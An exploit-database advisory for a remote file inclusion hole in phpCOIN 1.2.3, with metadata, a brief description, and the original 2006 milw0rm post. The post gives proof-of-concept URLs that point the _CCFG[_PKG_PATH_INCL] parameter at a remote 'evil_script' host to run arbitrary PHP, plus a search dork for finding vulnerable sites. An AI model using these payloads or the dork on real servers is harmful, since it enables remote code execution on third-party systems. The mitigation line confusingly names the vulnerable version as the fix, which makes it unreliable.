phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

vendor:

phpCOIN

by:

Timq

7,5

CVSS

HIGH

Remote Include Vulnerability

CWE

Product Name: phpCOIN

Affected Version From: 1.2.3

Affected Version To: 1.2.3

Patch Exists: YES

Related CWE: N/A

CPE: a:phpcoin:phpcoin:1.2.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the '_CCFG[_PKG_PATH_INCL]' parameter to 'constants.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

Mitigation:

Upgrade to the latest version of phpCOIN 1.2.3 or later.

Source

Exploit-DB raw data:

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration

#####################################################################

# milw0rm.com [2006-08-24]